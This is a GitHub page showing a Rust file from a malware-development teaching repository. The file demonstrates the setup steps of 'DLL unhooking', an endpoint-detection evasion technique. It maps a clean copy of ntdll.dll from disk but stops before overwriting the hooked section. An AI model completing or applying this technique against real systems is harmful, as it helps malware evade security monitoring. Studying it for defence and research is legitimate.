forked from Whitecat18/Rust-for-Malware-Development
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdll_unhooking2.rs
104 lines (84 loc) · 2.87 KB
/
dll_unhooking2.rs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
/*
DLL Unhooking Method 2
@5mukx
Resource covered from ired.team
*/
use std::io::{self, ErrorKind, Result};
use std::ptr::null_mut;
use winapi::um::fileapi::{CreateFileW, OPEN_EXISTING};
use winapi::um::handleapi::CloseHandle;
use winapi::um::libloaderapi::GetModuleHandleA;
use winapi::um::memoryapi::{CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, FILE_MAP_READ};
use winapi::um::processthreadsapi::GetCurrentProcess;
use winapi::um::psapi::{GetModuleInformation, MODULEINFO};
use winapi::um::winnt::{FILE_SHARE_READ, GENERIC_READ, PAGE_READONLY, SEC_IMAGE};
fn main() -> Result<()> {
unsafe {
let process = GetCurrentProcess();
let ntdll_module = GetModuleHandleA("ntdll.dll\0".as_ptr() as *const i8);
if ntdll_module.is_null() {
eprintln!("[-] Failed to get ntdll.dll handle");
return Err(io::Error::new(ErrorKind::Other, "Failed to get ntdll handle"));
}
println!("[+] Process Info: {:?}", process);
let mut mi = MODULEINFO {
lpBaseOfDll: null_mut(),
SizeOfImage: 0,
EntryPoint: null_mut(),
};
let success = GetModuleInformation(
process,
ntdll_module,
&mut mi,
std::mem::size_of::<MODULEINFO>() as u32,
);
if success == 0 {
return Err(io::Error::new(ErrorKind::Other, "Failed to get module information"));
}
let ntdll_path = "C:\\windows\\system32\\ntdll.dll";
let ntdll_path_utf16: Vec<u16> = ntdll_path.encode_utf16().chain(Some(0)).collect();
let ntdll_file = CreateFileW(
ntdll_path_utf16.as_ptr(),
GENERIC_READ,
FILE_SHARE_READ,
null_mut(),
OPEN_EXISTING,
0,
null_mut(),
);
if ntdll_file.is_null() {
return Err(io::Error::last_os_error());
}
println!("ntdll_file Handle: {:?}", ntdll_file);
let ntdll_mapping = CreateFileMappingW(
ntdll_file,
null_mut(),
PAGE_READONLY | SEC_IMAGE,
0,
0,
null_mut(),
);
if ntdll_mapping.is_null() {
CloseHandle(ntdll_file);
return Err(io::Error::last_os_error());
}
println!("CreateFileMappingW: {:?}", ntdll_mapping);
let ntdll_mapping_addr = MapViewOfFile(
ntdll_mapping,
FILE_MAP_READ,
0,
0,
0,
);
if ntdll_mapping_addr.is_null() {
CloseHandle(ntdll_mapping);
CloseHandle(ntdll_file);
return Err(io::Error::last_os_error());
}
println!("ntdll mapping addr: {:?}", ntdll_mapping_addr);
UnmapViewOfFile(ntdll_mapping_addr);
CloseHandle(ntdll_mapping);
CloseHandle(ntdll_file);
}
Ok(())
}